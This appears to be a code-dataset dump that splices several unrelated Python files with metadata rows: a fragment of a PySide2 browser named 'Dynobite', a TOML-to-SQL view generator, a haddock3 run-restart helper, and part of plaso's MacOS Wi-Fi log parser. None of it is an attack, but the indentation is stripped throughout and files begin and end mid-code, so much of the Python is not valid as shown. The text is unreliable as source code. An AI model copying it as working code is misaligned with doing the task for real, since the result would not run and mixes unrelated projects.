a = first_action
row_count = parent_item.rowCount()
for r in range(0, row_count):
item = parent_item.child(r)
title = item.text()
icon = item.icon()
url = item.data(_url_role)
if a < existing_action_count:
action = existing_actions[a]
if (title != action.toolTip()):
action.setText(BookmarkWidget.short_title(title))
action.setIcon(icon)
action.setToolTip(title)
action.setData(url)
action.setVisible(True)
else:
short_title = BookmarkWidget.short_title(title)
action = target_object.addAction(icon, short_title)
action.setToolTip(title)
action.setData(url)
action.triggered.connect(self._action_activated)
a = a + 1
while a < existing_action_count:
existing_actions[a].setVisible(False)
a = a + 1
def populate_tool_bar(self, tool_bar):
self._populate_actions(self._tool_bar_item(), tool_bar, 0)
def populate_other(self, menu, first_action):
self._populate_actions(self._other_item(), menu, first_action)
def _current_item(self):
index = self.currentIndex()
if index.isValid():
item = self._model.itemFromIndex(index)
if item.parent(): # exclude top level items
return item
return None
def context_menu_event(self, event):
context_menu = QMenu()
open_in_new_tab_action = context_menu.addAction("Open in New Tab")
remove_action = context_menu.addAction("Remove...")
current_item = self._current_item()
open_in_new_tab_action.setEnabled(current_item is not None)
remove_action.setEnabled(current_item is not None)
chosen_action = context_menu.exec_(event.globalPos())
if chosen_action == open_in_new_tab_action:
self.open_bookmarkInNewTab.emit(current_item.data(_url_role))
elif chosen_action == remove_action:
self._remove_item(current_item)
def _remove_item(self, item):
message = "Would you like to remove \"{}\"?".format(item.text())
button = QMessageBox.question(self, "Remove", message,
QMessageBox.Yes | QMessageBox.No)
if button == QMessageBox.Yes:
item.parent().removeRow(item.row())
def write_bookmarks(self):
if not self._modified:
return
dir_path = _config_dir()
native_dir_path = QDir.toNativeSeparators(dir_path)
dir = QFileInfo(dir_path)
if not dir.isDir():
if not QDir(dir.absolutePath()).mkpath(dir.fileName()):
warnings.warn('Cannot create {}.'.format(native_dir_path),
RuntimeWarning)
return
serialized_model = _serialize_model(self._model, dir_path)
bookmark_file_name = os.path.join(native_dir_path, _bookmark_file)
with open(bookmark_file_name, 'w') as bookmark_file:
json.dump(serialized_model, bookmark_file, indent=4)
def _read_bookmarks(self):
bookmark_file_name = os.path.join(QDir.toNativeSeparators(_config_dir()),
_bookmark_file)
if os.path.exists(bookmark_file_name):
return json.load(open(bookmark_file_name))
return _default_bookmarks
# Return a short title for a bookmark action,
# "Qt | Cross Platform.." -> "Qt"
@staticmethod
def short_title(t):
i = t.find(' | ')
if i == -1:
i = t.find(' - ')
return t[0:i] if i != -1 else t
main_windows = []
cwd = os.getcwd()
DYNOBITEFILES = "Dynobite Files"
DynobiteCreateFolder = os.path.join(cwd, DYNOBITEFILES)
DynobiteHistoryFolder = os.path.join(DYNOBITEFILES, "History.txt")
print("Dynobite\nVersion 94.0.992.31")
try:
os.mkdir(DynobiteCreateFolder)
except FileExistsError:
pass
picturefolder = "Images"
completedir = os.path.join(DynobiteCreateFolder, picturefolder)
def download(fullurl, downloadname):
import os
import requests
from urllib.parse import urlparse
from pathlib import Path
a = urlparse(fullurl)
fn=downloadname
if os.path.isfile(fn):
print('Skipping download, file exists {0}'.format(fn))
else:
print('Downloading file {0}'.format(fn))
r=requests.get(fullurl, stream=True)
with open(fn,'wb') as f:
f.write(r.content)
try:
os.mkdir(completedir)
url="https://raw.githubusercontent.com/abhinavsatheesh/dynfiles/main/Dynobite/Images/1.png"
downloadpath=completedir
download(url,f'{downloadpath}/1.png')
except FileExistsError:
pass
def create_main_window():
"""Creates a MainWindow using 75% of the available screen resolution."""
main_win = MainWindow()
main_windows.append(main_win)
available_geometry = app.desktop().availableGeometry(main_win)
main_win.resize(available_geometry.width() * 2 / 3,
available_geometry.height() * 2 / 3)
main_win.show()
return main_win
def create_main_window_with_browser():
"""Creates a MainWindow with a BrowserTabWidget."""
main_win = create_main_window()
return main_win.add_browser_tab()
class AboutDialog(QDialog):
def __init__(self, *args, **kwargs):
super(AboutDialog, self).__init__(*args, **kwargs)
self.setWindowIcon(QIcon(os.path.join(completedir, '1.png')))
QBtn = QDialogButtonBox.Ok # No cancel
self.buttonBox = QDialogButtonBox(QBtn)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
layout = QVBoxLayout()
title = QLabel("Dynobite - The Browser that is 2x Faster")
font = title.font()
font.setPointSize(20)
title.setFont(font)
layout.addWidget(title)
logo = QLabel()
logo.setPixmap(QPixmap(os.path.join(completedir, '1.png')))
layout.addWidget(logo)
layout.addWidget(QLabel("Built by Abhinav Satheesh"))
layout.addWidget(QLabel("https://abhinavsatheesh.github.dyn.com/"))
layout.addWidget(QLabel("GitHub Repository Link - https://github.com/abhinavsatheesh/dynfiles"))
layout.addWidget(QLabel("Version 94.0.992.31"))
for i in range(0, layout.count()):
layout.itemAt(i).setAlignment(Qt.AlignHCenter)
layout.addWidget(self.buttonBox)
self.setLayout(layout)
class MainWindow(QMainWindow):
"""Provides the parent window that includes the BookmarkWidget,
BrowserTabWidget, and a DownloadWidget, to offer the complete
web browsing experience."""
def __init__(self):
super(MainWindow, self).__init__()
self.setWindowTitle('Dynobite')
self._tab_widget = BrowserTabWidget(create_main_window_with_browser)
self._tab_widget.enabled_changed.connect(self._enabled_changed)
self._tab_widget.download_requested.connect(self._download_requested)
self.setCentralWidget(self._tab_widget)
self.connect(self._tab_widget, QtCore.SIGNAL("url_changed(QUrl)"),
self.url_changed)
self._bookmark_dock = QDockWidget()
self._bookmark_dock.setWindowTitle('Bookmarks')
self._bookmark_widget = BookmarkWidget()
self._bookmark_widget.open_bookmark.connect(self.load_url)
self._bookmark_widget.open_bookmark_in_new_tab.connect(self.load_url_in_new_tab)
self._bookmark_dock.setWidget(self._bookmark_widget)
self.addDockWidget(Qt.LeftDockWidgetArea, self._bookmark_dock)
self.setWindowIcon(QIcon(os.path.join(completedir, '1.png')))
self._find_tool_bar = None
self._bookmark_dock.customContextMenuRequested.connect(self.context_menu_event)
# self.view = QtWebEngineWidgets.QWebEngineView()
self._actions = {}
self._create_menu()
self._tool_bar = QToolBar()
self.addToolBar(self._tool_bar)
for action in self._actions.values():
if not action.icon().isNull():
self._tool_bar.addAction(action)
self._addres_line_edit = QLineEdit()
self._addres_line_edit.setClearButtonEnabled(True)
self._addres_line_edit.returnPressed.connect(self.load)
self._tool_bar.addWidget(self._addres_line_edit)
self._zoom_label = QLabel()
self.statusBar().addPermanentWidget(self._zoom_label)
self._update_zoom_label()
self._bookmarksToolBar = QToolBar()
self.addToolBar(Qt.TopToolBarArea, self._bookmarksToolBar)
self.insertToolBarBreak(self._bookmarksToolBar)
self._bookmark_widget.changed.connect(self._update_bookmarks)
self._update_bookmarks()
self.page = QWebEnginePage()
def context_menu_event(self, event):
context_menu = QMenu()
open_in_new_tab_action = context_menu.addAction("Open in New Tab")
remove_action = context_menu.addAction("Remove...")
current_item = self._current_item()
open_in_new_tab_action.setEnabled(current_item is not None)
remove_action.setEnabled(current_item is not None)
chosen_action = context_menu.exec_(event.globalPos())
if chosen_action == open_in_new_tab_action:
self.open_bookmarkInNewTab.emit(current_item.data(_url_role))
elif chosen_action == remove_action:
self._remove_item(current_item)
def _update_bookmarks(self):
self._bookmark_widget.populate_tool_bar(self._bookmarksToolBar)
self._bookmark_widget.populate_other(self._bookmark_menu, 3)
def _create_menu(self):
file_menu = self.menuBar().addMenu("&File")
new_tab_action = QAction("New Tab", self,
shortcut='Ctrl+T',
triggered=self.add_browser_tab)
file_menu.addAction(new_tab_action)
new_window_action = QAction("New Window", self,
shortcut='Ctrl+N',
triggered=self.OPEN_NEW_WINDOW)
file_menu.addAction(new_window_action)
close_tab_action = QAction("Close Tab", self,
shortcut="Ctrl+W",
triggered=self._close_current_tab)
file_menu.addAction(close_tab_action)
new_window_action = QAction("Open File", self,
shortcut='Ctrl+O',
triggered=self.open_file)
file_menu.addAction(new_window_action)
exit_action = QAction(QIcon.fromTheme("application-exit"), "E&xit",
self, shortcut="Ctrl+Q", triggered=qApp.quit)
file_menu.addAction(exit_action)
navigation_menu = self.menuBar().addMenu("&Navigation")
style_icons = ':/qt-project.org/styles/commonstyle/images/'
back_action = QAction(QIcon.fromTheme("go-previous",
QIcon(style_icons + 'left-32.png')),
"Back", self,
shortcut=QKeySequence(QKeySequence.Back),
triggered=self._tab_widget.back)
self._actions[QWebEnginePage.Back] = back_action
back_action.setEnabled(False)
navigation_menu.addAction(back_action)
forward_action = QAction(QIcon.fromTheme("go-next",
QIcon(style_icons + 'right-32.png')),
"Forward", self,
shortcut=QKeySequence(QKeySequence.Forward),
triggered=self._tab_widget.forward)
forward_action.setEnabled(False)
self._actions[QWebEnginePage.Forward] = forward_action
navigation_menu.addAction(forward_action)
reload_action = QAction(QIcon(style_icons + 'refresh-32.png'),
"Reload", self,
shortcut=QKeySequence(QKeySequence.Refresh),
triggered=self._tab_widget.reload)
self._actions[QWebEnginePage.Reload] = reload_action
reload_action.setEnabled(False)
navigation_menu.addAction(reload_action)
navigation_menu.addSeparator()
mute_action = QAction("Mute Tab", self,
shortcut="Ctrl+M",
triggered=self.MUTETAB)
navigation_menu.addAction(mute_action)
navigation_menu.addSeparator()
edit_menu = self.menuBar().addMenu("&Edit")
find_action = QAction("Find", self,
shortcut=QKeySequence(QKeySequence.Find),
triggered=self._show_find)
edit_menu.addAction(find_action)
edit_menu.addSeparator()
undo_action = QAction("Undo", self,
shortcut=QKeySequence(QKeySequence.Undo),
triggered=self._tab_widget.undo)
self._actions[QWebEnginePage.Undo] = undo_action
undo_action.setEnabled(False)
edit_menu.addAction(undo_action)
redo_action = QAction("Redo", self,
shortcut=QKeySequence(QKeySequence.Redo),
triggered=self._tab_widget.redo)
self._actions[QWebEnginePage.Redo] = redo_action
redo_action.setEnabled(False)
edit_menu.addAction(redo_action)
edit_menu.addSeparator()
cut_action = QAction("Cut", self,
shortcut=QKeySequence(QKeySequence.Cut),
triggered=self._tab_widget.cut)
self._actions[QWebEnginePage.Cut] = cut_action
cut_action.setEnabled(False)
edit_menu.addAction(cut_action)
copy_action = QAction("Copy", self,
shortcut=QKeySequence(QKeySequence.Copy),
triggered=self._tab_widget.copy)
self._actions[QWebEnginePage.Copy] = copy_action
copy_action.setEnabled(False)
edit_menu.addAction(copy_action)
paste_action = QAction("Paste", self,
shortcut=QKeySequence(QKeySequence.Paste),
triggered=self._tab_widget.paste)
self._actions[QWebEnginePage.Paste] = paste_action
paste_action.setEnabled(False)
edit_menu.addAction(paste_action)
edit_menu.addSeparator()
select_all_action = QAction("Select All", self,
shortcut=QKeySequence(QKeySequence.SelectAll),
triggered=self._tab_widget.select_all)
self._actions[QWebEnginePage.SelectAll] = select_all_action
select_all_action.setEnabled(False)
edit_menu.addAction(select_all_action)
self._bookmark_menu = self.menuBar().addMenu("&Bookmarks")
add_tool_bar_bookmark_action = QAction("&Add Bookmark", self,
shortcut="Ctrl+D",
triggered=self._add_tool_bar_bookmark)
self._bookmark_menu.addAction(add_tool_bar_bookmark_action)
self._bookmark_menu.addSeparator()
tools_menu = self.menuBar().addMenu("&Tools")
download_action = QAction("Open Downloads", self,
shortcut="Ctrl+J",
triggered=DownloadWidget.open_download_directory)
tools_menu.addAction(download_action)
history_action = QAction("History", self,
shortcut="Ctrl+H",
triggered=self._tab_widget.show_history)
tools_menu.addAction(history_action)
window_menu = self.menuBar().addMenu("&Window")
window_menu.addAction(self._bookmark_dock.toggleViewAction())
window_menu.addSeparator()
zoom_in_action = QAction(QIcon.fromTheme("zoom-in"),
"Zoom In", self,
shortcut=QKeySequence(QKeySequence.ZoomIn),
triggered=self._zoom_in)
window_menu.addAction(zoom_in_action)
zoom_out_action = QAction(QIcon.fromTheme("zoom-out"),
"Zoom Out", self,
shortcut=QKeySequence(QKeySequence.ZoomOut),
triggered=self._zoom_out)
window_menu.addAction(zoom_out_action)
reset_zoom_action = QAction(QIcon.fromTheme("zoom-original"),
"Reset Zoom", self,
shortcut="Ctrl+0",
triggered=self._reset_zoom)
window_menu.addAction(reset_zoom_action)
def open_file(self):
filename, _ = QFileDialog.getOpenFileName(self, "Open file", "",
"PDF Files (*.pdf);;"
"All files (*.*)")
split_tup = os.path.splitext(filename)
file_extension = split_tup[1]
if file_extension==".pdf":
root = Tk()
root.title("PDF Viewer")
root.geometry("550x750")
v1 = pdf.ShowPdf()
v2 = v1.pdf_view(root,
pdf_location = filename,
width = 750, height = 100)
v2.pack()
root.mainloop()
self._addres_line_edit.setText(filename)
def MUTETAB(self):
self.page.setAudioMuted(True)
def add_browser_tab(self):
return self._tab_widget.add_browser_tab()
QWebEnginePage.setUrl("https://www.google.com")
def _close_current_tab(self):
if self._tab_widget.count() > 1:
self._tab_widget.close_current_tab()
else:
self.close()
def print_page(self):
dlg = QPrintDialog(self.printer)
if dlg.exec_():
self.browser.page().print(self.printer, self.print_completed)
def print_completed(self, success):
pass
def OPEN_NEW_WINDOW(self):
create_main_window_with_browser()
def closeEvent(self, event):
if self._tab_widget.count() > 1:
reply = QMessageBox.question(self, 'Close all tabs?', f'You have {self._tab_widget.count()} tabs open', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
else:
self.close()
def load(self):
url_string = self._addres_line_edit.text().strip()
if validators.url(url_string):
q = QUrl(url_string)
justurl = str(q)
firsttime = justurl.split("PySide2.QtCore.QUrl('")
urlneeded = firsttime[1]
justurl = str(urlneeded)
secondtime = justurl.split("')")
urlfinal = secondtime[0]
print(urlfinal)
elif validators.url(f"https://{url_string}"):
q = QUrl(f"http://{url_string}")
justurl = str(q)
firsttime = justurl.split("PySide2.QtCore.QUrl('")
urlneeded = firsttime[1]
justurl = str(urlneeded)
secondtime = justurl.split("')")
urlfinal = secondtime[0]
print(urlfinal)
elif url_string.find("file:///") == 0 or url_string.find("view-source:") == 0 :
q = QUrl(url_string)
justurl = str(q)
firsttime = justurl.split("PySide2.QtCore.QUrl('")
urlneeded = firsttime[1]
justurl = str(urlneeded)
secondtime = justurl.split("')")
urlfinal = secondtime[0]
print(urlfinal)
else:
url = f'https://www.google.com/search?q={url_string.replace("+","%2B").replace(" ","+")}'
q = QUrl(url)
justurl = str(q)
firsttime = justurl.split("PySide2.QtCore.QUrl('")
urlneeded = firsttime[1]
justurl = str(urlneeded)
secondtime = justurl.split("')")
urlfinal = secondtime[0]
print(urlfinal)
self.load_url_string(urlfinal)
def load_url_string(self, url_s):
url = QUrl.fromUserInput(url_s)
if (url.isValid()):
self.load_url(url)
def load_url(self, url):
self._tab_widget.load(url)
def load_url_in_new_tab(self, url):
self.add_browser_tab().load(url)
def url_changed(self, url):
self._addres_line_edit.setText(url.toString())
def _enabled_changed(self, web_action, enabled):
action = self._actions[web_action]
if action:
action.setEnabled(enabled)
def _add_bookmark(self):
index = self._tab_widget.currentIndex()
if index >= 0:
url = self._tab_widget.url()
title = self._tab_widget.tabText(index)
icon = self._tab_widget.tabIcon(index)
self._bookmark_widget.add_bookmark(url, title, icon)
def _add_tool_bar_bookmark(self):
index = self._tab_widget.currentIndex()
if index >= 0:
url = self._tab_widget.url()
title = self._tab_widget.tabText(index)
icon = self._tab_widget.tabIcon(index)
self._bookmark_widget.add_tool_bar_bookmark(url, title, icon)
def _zoom_in(self):
new_zoom = self._tab_widget.zoom_factor() * 1.5
if (new_zoom <= WebEngineView.maximum_zoom_factor()):
self._tab_widget.set_zoom_factor(new_zoom)
self._update_zoom_label()
def _zoom_out(self):
new_zoom = self._tab_widget.zoom_factor() / 1.5
if (new_zoom >= WebEngineView.minimum_zoom_factor()):
self._tab_widget.set_zoom_factor(new_zoom)
self._update_zoom_label()
def _reset_zoom(self):
self._tab_widget.set_zoom_factor(1)
self._update_zoom_label()
def _update_zoom_label(self):
percent = int(self._tab_widget.zoom_factor() * 100)
self._zoom_label.setText("{}%".format(percent))
def _download_requested(self, item):
# Remove old downloads before opening a new one
for old_download in self.statusBar().children():
if (type(old_download).__name__ == 'DownloadWidget' and
old_download.state() != QWebEngineDownloadItem.DownloadInProgress):
self.statusBar().removeWidget(old_download)
del old_download
item.accept()
download_widget = DownloadWidget(item)
download_widget.remove_requested.connect(self._remove_download_requested,
Qt.QueuedConnection)
self.statusBar().addWidget(download_widget)
def _remove_download_requested(self):
download_widget = self.sender()
self.statusBar().removeWidget(download_widget)
del download_widget
def _show_find(self):
if self._find_tool_bar is None:
self._find_tool_bar = FindToolBar()
self._find_tool_bar.find.connect(self._tab_widget.find)
self.addToolBar(Qt.BottomToolBarArea, self._find_tool_bar)
else:
self._find_tool_bar.show()
self._find_tool_bar.focus_find()
def write_bookmarks(self):
self._bookmark_widget.write_bookmarks()
if __name__ == '__main__':
app = QApplication(sys.argv)
main_win = create_main_window()
initial_urls = sys.argv[1:]
if not initial_urls:
initial_urls.append('https://www.google.com')
for url in initial_urls:
main_win.load_url_in_new_tab(QUrl.fromUserInput(url))
exit_code = app.exec_()
main_win.write_bookmarks()
sys.exit(exit_code)
| 39,278 | 698 | 2,793 |
a5d9db7e9536af8f118ef80fb9e0bd10dd06b72d | 3,321 | py | Python | dockerfiles/ingest/toml2sql.py | ctberthiaume/gradients3-data-integration | 1f1d5eeaa262cbac8298eff5787f3ba68483486a | [
"MIT"
] | null | null | null | dockerfiles/ingest/toml2sql.py | ctberthiaume/gradients3-data-integration | 1f1d5eeaa262cbac8298eff5787f3ba68483486a | [
"MIT"
] | null | null | null | dockerfiles/ingest/toml2sql.py | ctberthiaume/gradients3-data-integration | 1f1d5eeaa262cbac8298eff5787f3ba68483486a | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import click
import os
import sys
import toml
lu = { 'text': 'TEXT', 'real': 'DOUBLE PRECISION', 'time': 'TIMESTAMPTZ NOT NULL' }
@click.command()
@click.option('--no-geo-join', default=False, is_flag=True, show_default=True,
help="Don't produce the joined view to lat/lon, for example if this is the lat/lon data")
@click.argument('input', type=click.Path(exists=True), nargs=1)
if __name__ == '__main__':
main()
| 36.494505 | 112 | 0.602228 | #!/usr/bin/env python3
import click
import os
import sys
import toml
lu = { 'text': 'TEXT', 'real': 'DOUBLE PRECISION', 'time': 'TIMESTAMPTZ NOT NULL' }
@click.command()
@click.option('--no-geo-join', default=False, is_flag=True, show_default=True,
help="Don't produce the joined view to lat/lon, for example if this is the lat/lon data")
@click.argument('input', type=click.Path(exists=True), nargs=1)
def main(no_geo_join, input):
with open(input, newline=None, encoding='utf-8') as f:
toml_text = f.read()
data = toml.loads(toml_text)
print(create_table(data))
print('')
print(create_time_bucket_view(data))
if not no_geo_join:
print('')
print(create_geo_join_view(data))
def create_table(data):
sql_lines = ['CREATE TABLE IF NOT EXISTS {}_raw ('.format(data['table'])]
for i, f in enumerate(data['fields']):
sql_lines.append(' {} {}'.format(f['name'], lu[f['type']]))
if i < len(data['fields']) - 1:
sql_lines[-1] += ','
sql_lines.append(');')
sql_lines.append('')
sql_lines.append("SELECT create_hypertable('{}_raw', 'time', if_not_exists := true);".format(data['table']))
return os.linesep.join(sql_lines)
def create_time_bucket_view(data, bucket_width='1m'):
real_fields = [x['name'] for x in data['fields'] if x['type'] == 'real']
group_fields = [x['name'] for x in data['fields'] if x['type'] == 'text' and x['groupby']]
sql_lines = ['CREATE OR REPLACE VIEW {} AS'.format(data['table'])]
sql_lines.append(' SELECT')
sql_lines.append(" time_bucket('{}', {}_raw.time) AS time".format(bucket_width, data['table']))
for i, gf in enumerate(group_fields):
sql_lines[-1] += ','
sql_lines.append(f' {gf}')
for i, rf in enumerate(real_fields):
sql_lines[-1] += ','
sql_lines.append(f' avg({rf}) as {rf}')
sql_lines.append(' FROM {}_raw'.format(data['table']))
sql_lines.append(' GROUP BY 1')
if group_fields:
for i in range(len(group_fields)):
sql_lines[-1] += f', {i+2}'
sql_lines.append(' ORDER BY 1;')
return os.linesep.join(sql_lines)
def create_geo_join_view(data, bucket_width='1m'):
real_fields = [x['name'] for x in data['fields'] if x['type'] == 'real']
group_fields = [x['name'] for x in data['fields'] if x['type'] == 'text' and x['groupby']]
sql_lines = ['CREATE OR REPLACE VIEW {}_geo AS'.format(data['table'])]
sql_lines.append(' SELECT')
sql_lines.append(" a.time")
for i, rf in enumerate(real_fields):
sql_lines[-1] += ','
if rf.lower() == 'lat' or rf.lower() == 'lon':
sql_lines.append(' a.{} AS {}_{}'.format(rf, data['table'], rf))
else:
sql_lines.append(f' a.{rf}')
for i, gf in enumerate(group_fields):
sql_lines[-1] += ','
sql_lines.append(f' a.{gf}')
sql_lines[-1] += ','
sql_lines.append(' b.lat')
sql_lines[-1] += ','
sql_lines.append(' b.lon')
sql_lines.append(' FROM {} AS a'.format(data['table']))
sql_lines.append(' INNER JOIN geo AS b'.format(bucket_width))
sql_lines.append(' ON a.time = b.time')
sql_lines.append(' ORDER BY 1;')
return os.linesep.join(sql_lines)
if __name__ == '__main__':
main()
| 2,778 | 0 | 91 |
8028ff85563dfd96fbbb5a7472e5dd3074d3c5e6 | 1,448 | py | Python | src/haddock/gear/restart_run.py | joaomcteixeira/haddock3 | b7f02978cea90622844acde874440d75f55cf446 | [
"Apache-2.0"
] | 21 | 2020-06-12T00:13:11.000Z | 2022-03-28T06:00:17.000Z | src/haddock/gear/restart_run.py | joaomcteixeira/haddock3 | b7f02978cea90622844acde874440d75f55cf446 | [
"Apache-2.0"
] | 293 | 2020-10-22T10:59:23.000Z | 2022-03-25T12:50:06.000Z | src/haddock/gear/restart_run.py | joaomcteixeira/haddock3 | b7f02978cea90622844acde874440d75f55cf446 | [
"Apache-2.0"
] | 17 | 2020-06-25T15:55:53.000Z | 2022-03-24T11:50:10.000Z | """Features to allow run restart from a given step."""
from argparse import ArgumentTypeError
from functools import partial
from haddock.libs.libutil import non_negative_int, remove_folder
_help_cli = """Restart the run from a given step. Previous folders from
the selected step onward will be deleted."""
_arg_non_neg_int = partial(
non_negative_int,
exception=ArgumentTypeError,
emsg="Minimum value is 0, {!r} given.",
)
def add_restart_arg(parser):
"""Adds `--restart` option to argument parser."""
parser.add_argument(
"--restart",
type=_arg_non_neg_int,
default=None,
help=_help_cli,
)
def remove_folders_after_number(run_dir, num):
"""
Remove calculation folder after (included) a given number.
Example
-------
If the following step folders exist:
00_topoaa
01_rigidbody
02_mdref
03_flexref
and the number `2` is given, folders `02_` and `03_` will be
deleted.
Parameters
----------
run_dir : pathlib.Path
The run directory.
num : int
The number of the folder from which to delete calculation step
folders. `num` must be non-negative integer, or equivalent
representation.
"""
num = _arg_non_neg_int(num)
previous = sorted(list(run_dir.resolve().glob('[0-9][0-9]*/')))
for folder in previous[num:]:
remove_folder(folder)
return
| 24.133333 | 71 | 0.652624 | """Features to allow run restart from a given step."""
from argparse import ArgumentTypeError
from functools import partial
from haddock.libs.libutil import non_negative_int, remove_folder
_help_cli = """Restart the run from a given step. Previous folders from
the selected step onward will be deleted."""
_arg_non_neg_int = partial(
non_negative_int,
exception=ArgumentTypeError,
emsg="Minimum value is 0, {!r} given.",
)
def add_restart_arg(parser):
"""Adds `--restart` option to argument parser."""
parser.add_argument(
"--restart",
type=_arg_non_neg_int,
default=None,
help=_help_cli,
)
def remove_folders_after_number(run_dir, num):
"""
Remove calculation folder after (included) a given number.
Example
-------
If the following step folders exist:
00_topoaa
01_rigidbody
02_mdref
03_flexref
and the number `2` is given, folders `02_` and `03_` will be
deleted.
Parameters
----------
run_dir : pathlib.Path
The run directory.
num : int
The number of the folder from which to delete calculation step
folders. `num` must be non-negative integer, or equivalent
representation.
"""
num = _arg_non_neg_int(num)
previous = sorted(list(run_dir.resolve().glob('[0-9][0-9]*/')))
for folder in previous[num:]:
remove_folder(folder)
return
| 0 | 0 | 0 |
8a59815a3eab468647b6b48617378fa144d3d33e | 10,474 | py | Python | plaso/parsers/mac_wifi.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | 2 | 2021-05-31T17:16:48.000Z | 2022-02-01T16:59:12.000Z | plaso/parsers/mac_wifi.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | null | null | null | plaso/parsers/mac_wifi.py | pyllyukko/plaso | 7533db2d1035ca71d264d6281ebd5db2d073c587 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""Parses for MacOS Wifi log (wifi.log) files."""
import re
import pyparsing
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.lib import timelib
from plaso.parsers import logger
from plaso.parsers import manager
from plaso.parsers import text_parser
class MacWifiLogEventData(events.EventData):
"""Mac Wifi log event data.
Attributes:
action (str): known WiFI action, for example connected to an AP,
configured, etc. If the action is not known, the value is
the message of the log (text variable).
agent (str): name and identifier of process that generated the log message.
function (str): name of function that generated the log message.
text (str): log message
"""
DATA_TYPE = 'mac:wifilog:line'
def __init__(self):
"""Initializes event data."""
super(MacWifiLogEventData, self).__init__(data_type=self.DATA_TYPE)
self.action = None
self.agent = None
self.function = None
self.text = None
class MacWifiLogParser(text_parser.PyparsingSingleLineTextParser):
"""Parses MacOS Wifi log (wifi.log) files."""
NAME = 'macwifi'
DATA_FORMAT = 'MacOS Wifi log (wifi.log) file'
_ENCODING = 'utf-8'
THREE_DIGITS = text_parser.PyparsingConstants.THREE_DIGITS
THREE_LETTERS = text_parser.PyparsingConstants.THREE_LETTERS
# Regular expressions for known actions.
_CONNECTED_RE = re.compile(r'Already\sassociated\sto\s(.*)\.\sBailing')
_WIFI_PARAMETERS_RE = re.compile(
r'\[ssid=(.*?), bssid=(.*?), security=(.*?), rssi=')
_KNOWN_FUNCTIONS = [
'airportdProcessDLILEvent',
'_doAutoJoin',
'_processSystemPSKAssoc']
_AGENT = (
pyparsing.Literal('<') +
pyparsing.Combine(
pyparsing.Literal('airportd') + pyparsing.CharsNotIn('>'),
joinString='', adjacent=True).setResultsName('agent') +
pyparsing.Literal('>'))
_DATE_TIME = pyparsing.Group(
THREE_LETTERS.setResultsName('day_of_week') +
THREE_LETTERS.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME_ELEMENTS + pyparsing.Suppress('.') +
THREE_DIGITS.setResultsName('milliseconds'))
# Log line with a known function name.
_MAC_WIFI_KNOWN_FUNCTION_LINE = (
_DATE_TIME.setResultsName('date_time') + _AGENT +
pyparsing.oneOf(_KNOWN_FUNCTIONS).setResultsName('function') +
pyparsing.Literal(':') +
pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
# Log line with an unknown function name.
_MAC_WIFI_LINE = (
_DATE_TIME.setResultsName('date_time') + pyparsing.NotAny(
_AGENT +
pyparsing.oneOf(_KNOWN_FUNCTIONS) +
pyparsing.Literal(':')) +
pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
_MAC_WIFI_HEADER = (
_DATE_TIME.setResultsName('date_time') +
pyparsing.Literal('***Starting Up***').setResultsName('text'))
_DATE_TIME_TURNED_OVER_HEADER = pyparsing.Group(
text_parser.PyparsingConstants.MONTH.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME_ELEMENTS)
_MAC_WIFI_TURNED_OVER_HEADER = (
_DATE_TIME_TURNED_OVER_HEADER.setResultsName('date_time') +
pyparsing.Combine(
pyparsing.Word(pyparsing.printables) +
pyparsing.Word(pyparsing.printables) +
pyparsing.Literal('logfile turned over') +
pyparsing.LineEnd(),
joinString=' ', adjacent=False).setResultsName('text'))
# Define the available log line structures.
LINE_STRUCTURES = [
('header', _MAC_WIFI_HEADER),
('turned_over_header', _MAC_WIFI_TURNED_OVER_HEADER),
('known_function_logline', _MAC_WIFI_KNOWN_FUNCTION_LINE),
('logline', _MAC_WIFI_LINE)]
_SUPPORTED_KEYS = frozenset([key for key, _ in LINE_STRUCTURES])
def __init__(self):
"""Initializes a parser."""
super(MacWifiLogParser, self).__init__()
self._last_month = 0
self._year_use = 0
def _GetAction(self, action, text):
"""Parse the well known actions for easy reading.
Args:
action (str): the function or action called by the agent.
text (str): mac Wifi log text.
Returns:
str: a formatted string representing the known (or common) action.
If the action is not known the original log text is returned.
"""
# TODO: replace "x in y" checks by startswith if possible.
if 'airportdProcessDLILEvent' in action:
interface = text.split()[0]
return 'Interface {0:s} turn up.'.format(interface)
if 'doAutoJoin' in action:
match = self._CONNECTED_RE.match(text)
if match:
ssid = match.group(1)[1:-1]
else:
ssid = 'Unknown'
return 'Wifi connected to SSID {0:s}'.format(ssid)
if 'processSystemPSKAssoc' in action:
wifi_parameters = self._WIFI_PARAMETERS_RE.search(text)
if wifi_parameters:
ssid = wifi_parameters.group(1)
bssid = wifi_parameters.group(2)
security = wifi_parameters.group(3)
if not ssid:
ssid = 'Unknown'
if not bssid:
bssid = 'Unknown'
if not security:
security = 'Unknown'
return (
'New wifi configured. BSSID: {0:s}, SSID: {1:s}, '
'Security: {2:s}.').format(bssid, ssid, security)
return text
def _GetTimeElementsTuple(self, key, structure):
"""Retrieves a time elements tuple from the structure.
Args:
key (str): name of the parsed structure.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
Returns:
tuple: containing:
year (int): year.
month (int): month, where 1 represents January.
day_of_month (int): day of month, where 1 is the first day of the month.
hours (int): hours.
minutes (int): minutes.
seconds (int): seconds.
milliseconds (int): milliseconds.
"""
time_elements_tuple = self._GetValueFromStructure(structure, 'date_time')
# TODO: what if time_elements_tuple is None.
if key == 'turned_over_header':
month, day, hours, minutes, seconds = time_elements_tuple
milliseconds = 0
else:
_, month, day, hours, minutes, seconds, milliseconds = time_elements_tuple
# Note that dfdatetime_time_elements.TimeElements will raise ValueError
# for an invalid month.
